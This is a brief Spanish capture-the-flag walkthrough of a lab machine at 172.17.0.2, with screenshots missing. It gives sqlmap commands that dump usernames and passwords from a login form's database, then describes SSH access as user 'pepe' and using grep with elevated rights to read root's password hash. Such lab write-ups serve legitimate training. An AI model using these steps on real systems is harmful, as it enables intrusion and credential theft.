realizamos un escaneo de puertos

image.png

ingresaor al servicio web

image.png

tenemos un login, lo que puede ser indicio de base de datos

image.png

siguiendo con el reconocimiento no encuentro nada y pruebo hacer un inyeccion sql

hacemos sqlmap -u "[<http://172.17.0.2/login.html>](<http://172.17.0.2/login.html>)" --form --dbs --batch

encontramos una base de datos

image.png

luego hacemos un sqlmap -u "<http://172.17.0.2/login.html>" --forms -D users -T usuarios --columns --batch

image.png

sqlmap -u "[<http://172.17.0.2/login.html>](<http://172.17.0.2/login.html>)" --forms -D users -T usuarios -C id,password,username --dump --batch

image.png

con estas credenciales pruebo entrar por ssh y consigo entrar con el usuario pepe

pruebo que puedo ejecutar como usuario pepe

image.png

vemos que podemos usar grep y probamos obtener el hash del usuario root

image.png